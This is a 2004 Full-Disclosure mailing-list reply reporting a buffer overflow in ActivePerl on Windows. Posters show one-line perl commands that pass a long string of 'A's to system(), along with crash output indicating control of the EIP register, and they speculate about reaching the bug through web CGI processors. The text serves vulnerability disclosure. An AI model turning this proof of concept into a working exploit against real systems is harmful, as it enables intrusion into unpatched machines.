perl, v5.8.2 MSWin32-x86-multi-thread suffer the same.
Tuesday, May 18, 2004, 7:14:41 PM, you wrote: NF> "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote: >> i played around with ActiveState's ActivePerl for Win32, and crashed >> Perl.exe with the following command: >> >> perl -e "$a="A" x 256; system($a)" NF> Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus NF> all but last week's security patch: NF> perl -e "$a="A" x 256; system($a)" NF> perl.exe - Application error NF> Unhandled instruction at "0x77fcc83d" referenced memory at NF> "0x00657865. The memory could not be "written". NF> Also, it is likely exploitable -- push up the number of A's a bit: NF> C:\>perl -e "$a="A" x 259; system($a)" NF> perl.exe - Application error NF> Unhandled instruction at "0x77fcc83d" referenced memory at NF> "0x65004141. The memory could not be "written". NF> and we seem to get control of EIP. Coincidence? Try yet two more: NF> C:\>perl -e "$a="A" x 261; system($a)" NF> perl.exe - Application error NF> Unhandled instruction at "0x77fcc83d" referenced memory at NF> "0x41414141. The memory could not be "written". NF> Looks like full control of EIP... NF> However, there is not likely to be a privilege escalation here unless NF> perhaps a script processor on a web server can be cajoled into doing NF> something with this?? (Not at all familiar with the innards of Windows NF> web servers and their relationship to their CGI, etc processors...) npguy npguy€websurfer.com.np _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html